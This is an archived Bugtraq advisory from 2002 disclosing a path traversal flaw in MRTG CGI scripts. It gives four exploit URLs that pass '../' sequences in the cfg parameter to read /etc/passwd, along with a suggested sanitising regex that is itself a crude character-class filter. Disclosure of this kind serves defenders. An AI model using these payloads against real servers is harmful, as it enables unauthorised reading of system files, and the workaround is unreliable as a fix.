Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

new advisory

From: "UkR-XblP?" <cuctema () ok ru>
Date: Sat, 02 Feb 2002 04:47:29 +0300
---=== UkR Security Team advisory ===--- Name : MRTG CGI script "show files" Vulnerability About : The Multi Router Traffic Grapher (MRTG) is a tool to monitor the traffic load on network-links. MRTG generates HTML pages containing GIF images which provide a LIVE visual representation of this traffic 
Product vendor: MRTG / http://www.mrtg.org
Problem : Problem lyes in incorrect validation of user submitted -by-browser information, that can show first string of any file of the system where script installed. Workaround : this will help in somewhat : $input =~ s/[(\.\.)|\/]//g; 
Author        : UkR-XblP / UkR security team
Exploit : http://www.target.com/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd 
                http://www.target.com/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
                http://www.target.com/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
                http://www.target.com/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
---
Professional hosting for everyone - http://www.host.ru
Previous By Date Next
Previous By Thread Next

Current thread: